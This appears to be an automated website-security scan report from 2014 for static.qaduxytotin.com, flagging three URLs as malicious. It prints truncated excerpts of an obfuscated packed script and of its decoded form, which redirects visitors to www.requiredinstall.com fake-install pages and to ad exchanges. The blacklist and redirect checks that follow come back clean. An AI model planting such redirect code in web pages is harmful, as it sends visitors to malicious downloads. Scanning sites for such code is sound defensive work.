Scanned pages/files
Request | Server response | Status |
http://static.qaduxytotin.com/static.qaduxytotin.com | 200 OK Content-Length: 35960 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.requiredinstall.com eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('x(1b 1f==="V"||1f==U){1f=R}B 5k(4x){f 5s="aU"+"aX"+"cC"+"cs+/"+"=";f 3o="";f 6e,5Z,6X="";f 6E,5R,5p,5U="";f i=0;do{6E=5s.1A( ...[3793 bytes skipped]... Decoded script: ...[29329 bytes skipped]... rb?id=390008"],"XX":["https://secure.adnxs.com/clktrb?id=390007","https://secure.adnxs.com/clktrb?id=389979","https://secure.adnxs.com/clktrb?id=390008"]};var cc=getCountryCode();var opts=geoMap["MX"];var rand=Math.floor(Math.random()*opts.length);var u=opts[rand];setTimeout('document.location.href = "'+u+'";',2000)};var tug1Camp={};tug1Camp.slug="tug1";tug1Camp.weight=55;tug1Camp.countries="*";tug1Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=1";setTimeout('document.location.href = "'+u+'";',2000)};var tug2Camp={};tug2Camp.slug="tug2";tug2Camp.weight=55;tug2Camp.countries="*";tug2Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=2";setTimeout('document.location.href = "'+u+'";',2000)};var ism1Camp={};ism1Camp.slug="ism1";ism1Camp.weight=55;ism1Camp.countries="*";ism1Camp.write=function(){var u="http://exchange.admailtiser.com/WhiteLabelBidRequestHan ...[81102 bytes skipped]... | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://bits.wikimedia.org/geoiplookup | 200 geoiplookup Content-Length: 96 Content-Type: text/javascript | clean |
http://static.qaduxytotin.com/ | 200 OK Content-Length: 35960 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.requiredinstall.com eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('x(1b 1f==="V"||1f==U){1f=R}B 5k(4x){f 5s="aU"+"aX"+"cC"+"cs+/"+"=";f 3o="";f 6e,5Z,6X="";f 6E,5R,5p,5U="";f i=0;do{6E=5s.1A( ...[3793 bytes skipped]... Decoded script: ...[29329 bytes skipped]... rb?id=390008"],"XX":["https://secure.adnxs.com/clktrb?id=390007","https://secure.adnxs.com/clktrb?id=389979","https://secure.adnxs.com/clktrb?id=390008"]};var cc=getCountryCode();var opts=geoMap["MX"];var rand=Math.floor(Math.random()*opts.length);var u=opts[rand];setTimeout('document.location.href = "'+u+'";',2000)};var tug1Camp={};tug1Camp.slug="tug1";tug1Camp.weight=55;tug1Camp.countries="*";tug1Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=1";setTimeout('document.location.href = "'+u+'";',2000)};var tug2Camp={};tug2Camp.slug="tug2";tug2Camp.weight=55;tug2Camp.countries="*";tug2Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=2";setTimeout('document.location.href = "'+u+'";',2000)};var ism1Camp={};ism1Camp.slug="ism1";ism1Camp.weight=55;ism1Camp.countries="*";ism1Camp.write=function(){var u="http://exchange.admailtiser.com/WhiteLabelBidRequestHan ...[81102 bytes skipped]... | ||
http://static.qaduxytotin.com/test404page.js | 200 OK Content-Length: 35960 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.requiredinstall.com eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('x(1b 1f==="V"||1f==U){1f=R}B 5k(4x){f 5s="aU"+"aX"+"cC"+"cs+/"+"=";f 3o="";f 6e,5Z,6X="";f 6E,5R,5p,5U="";f i=0;do{6E=5s.1A( ...[3793 bytes skipped]... Decoded script: ...[29329 bytes skipped]... rb?id=390008"],"XX":["https://secure.adnxs.com/clktrb?id=390007","https://secure.adnxs.com/clktrb?id=389979","https://secure.adnxs.com/clktrb?id=390008"]};var cc=getCountryCode();var opts=geoMap["MX"];var rand=Math.floor(Math.random()*opts.length);var u=opts[rand];setTimeout('document.location.href = "'+u+'";',2000)};var tug1Camp={};tug1Camp.slug="tug1";tug1Camp.weight=55;tug1Camp.countries="*";tug1Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=1";setTimeout('document.location.href = "'+u+'";',2000)};var tug2Camp={};tug2Camp.slug="tug2";tug2Camp.weight=55;tug2Camp.countries="*";tug2Camp.write=function(){var u="http://www.requiredinstall.com/SuxgELn6/detection/n/?source=2";setTimeout('document.location.href = "'+u+'";',2000)};var ism1Camp={};ism1Camp.slug="ism1";ism1Camp.weight=55;ism1Camp.countries="*";ism1Camp.write=function(){var u="http://exchange.admailtiser.com/WhiteLabelBidRequestHan ...[81102 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: static.qaduxytotin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 29 Oct 2014 09:42:30 GMT
Server: nginx/1.1.19
Content-Type: text/html
X-Cache: HIT
X-Powered-By: PHP/5.4.26
GET / HTTP/1.1
Host: static.qaduxytotin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 29 Oct 2014 09:42:30 GMT
Server: nginx/1.1.19
Content-Type: text/html
X-Cache: HIT
X-Powered-By: PHP/5.4.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: static.qaduxytotin.com
Referer: http://www.google.com/search?q=static.qaduxytotin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: static.qaduxytotin.com
Referer: http://www.google.com/search?q=static.qaduxytotin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=static.qaduxytotin.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://static.qaduxytotin.com/
Result: static.qaduxytotin.com is not infected or malware details are not published yet.
Result: static.qaduxytotin.com is not infected or malware details are not published yet.